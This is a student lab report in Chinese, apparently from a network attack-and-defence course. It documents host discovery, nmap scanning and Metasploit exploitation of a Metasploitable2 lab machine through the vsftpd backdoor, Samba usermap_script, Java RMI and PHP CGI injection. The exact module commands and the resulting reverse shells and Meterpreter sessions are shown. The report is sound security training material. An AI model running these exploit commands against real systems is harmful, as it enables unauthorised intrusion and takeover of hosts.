当前位置: 首页 > news >正文

20232403 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

主要内容:使用ARP扫描和nmap进行主机发现与端口扫描、Vsftpd后门漏洞获得root权限、Samba命令注入漏洞获取系统访问、Java RMI反序列化漏洞建立Meterpreter会话、PHP CGI参数注入漏洞。
掌握Metasploit命令:use命令选择合适模块、set命令配置目标参数、理解不同payload的适用场景、sessions命令管理多个连接。
理解漏洞利用技术:识别和利用软件后门、通过参数注入执行系统命令、利用不安全的反序列化过程、针对Web应用的特定攻击、从不同漏洞获得不同权限级别。

2.实验过程

2.1前期渗透

2.1.1主机发现

查看kali虚拟机和Metasploitable2虚拟机的ip
image
屏幕截图 2025-11-23 201815
可以看到kali虚拟机ip为192.168.19.129
Metasploitable2虚拟机ip为192.168.19.143
sudo msfconsole选择ARP扫描模块进行网络主机发现
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.19.0/24
run
image
可以确认Metasploitable2的IP地址为192.168.19.143

2.1.2端口扫描

使用nmap进行扫描sudo nmap -sS -sV -O 192.168.19.143
image
根据已开放的服务,可以发现对应的漏洞

2.2Vsftpd源码包后门漏洞

在msfconsole中执行:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.19.143
exploit
image
image
可以看到成功触发了vsftpd 2.3.4的后门并连接到目标主机的21端口,目标主机在6200端口开启了后门服务,成功获得命令shell会话。

2.3SambaMS-RPC Shell命令注入漏洞

在msfconsole中执行:
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.19.143
exploit
image
可以看到在攻击机的4444端口启动监听,成功获得命令shell会话192.168.19.143:48816 → 192.168.19.129:4444

2.4Java RMI SERVER命令执行漏洞

在msfconsole中执行:
use exploit/multi/misc/java_rmi_server
set RHOSTS 192.168.19.143
exploit
sessions -i id
shell
image
可以看到使用java/meterpreter/reverse_tcp作为payload,在攻击机的8080端口启动HTTP服务用于传输payload,成功与目标1099端口建立连接,并获得Meterpreter会话192.168.19.129:4444 → 192.168.19.143:38261

2.5PHP CGI参数执行注入漏洞

在msfconsole中执行:
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.19.143
exploit
image
可以看到成功获得Meterpreter会话,通过shell命令获得系统shell,确认获得www-data用户权限,并验证了Web目录访问。

3.问题及解决方案

  • 问题1:在前期渗透时扫描靶机网段未成功发现靶机
    image
  • 问题1解决方案:一开始是在普通用户权限下运行msfconsole,普通用户不允许进行可能影响网络稳定的操作,将启动命令换为sudo msfconsole后可以正常运行。

4.学习感悟、思考等

这次实验让我深刻认识到信息收集是很关键的一环,不同漏洞具有独特的触发机制和权限影响,需要根据目标环境灵活选择攻击向量。从攻击者视角,我理解了攻击链构建过程和服务配置的风险。从防御角度,认识到及时更新、最小权限、网络隔离和安全监控的重要性。实验不仅巩固了技术基础,更培养了全面的安全思维。

http://www.jsqmd.com/news/48694/

相关文章:

  • 第二讲类神经网络训练不起来
  • 【计算机网络】深入浅出DNS:网络世界的地址簿与导航系统 - 教程
  • 2025-01-24-Fri-T-如何做一个开源项目
  • 利用大语言模型分析技术支持诈骗Facebook群组的网络犯罪研究
  • 一些唐话
  • 2025-05-29-Thu-T-设计模式
  • 2025-05-27-Tue-T-JVM
  • 11-28
  • 20232421 2025-2026-1 《网络与系统攻防技术》实验六实验报告
  • 20232315 2025-2026-1 《网络与系统攻防技术》实验六实验报告
  • [CISCN 2022 华东北]duck WP
  • 20232320 2025-2026-1 《网络与系统攻防技术》实验六实验报告
  • 2025-01-14-Tue-T-实体关系图ERD
  • 《Either Way》
  • 20232424 2025-2026-1 《网络与系统攻防技术》实验六实验报告
  • 2024-11-26-Tue-T-SSM
  • HTML游戏创建:利用视频作为特效自动播放的方法
  • 第四章-Tomcat线程模型与运行方式 - 指南
  • 11-21
  • 11-25
  • 11-24
  • 2023-10-15-R-如何阅读一本书
  • 2023-10-11-T-JAVA
  • 通过SSH反向隧道让远程服务器走本地代理
  • 2023-09-19-R-金字塔原理
  • 2023-09-19-E-文章管理
  • 11-6
  • 11-18
  • 11-12
  • 11-11